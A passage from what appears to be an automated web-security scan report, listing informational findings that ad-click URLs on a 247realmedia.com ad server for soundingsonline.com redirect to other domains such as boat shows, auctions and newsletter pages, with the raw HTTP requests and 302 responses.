P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1348531661/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1348531661/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1348531661/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1349609847/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1349609847/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1349609847/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1354223400/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1354223400/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1354223400/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1358228312/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1358228312/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1358228312/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360801130/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360801130/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360801130/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.200. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1364011237/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1364011237/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1364011237/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1368942175/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1368942175/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1368942175/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:12:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1373935794/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1373935794/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1373935794/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/138949847/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/138949847/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/138949847/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:50:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:11:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

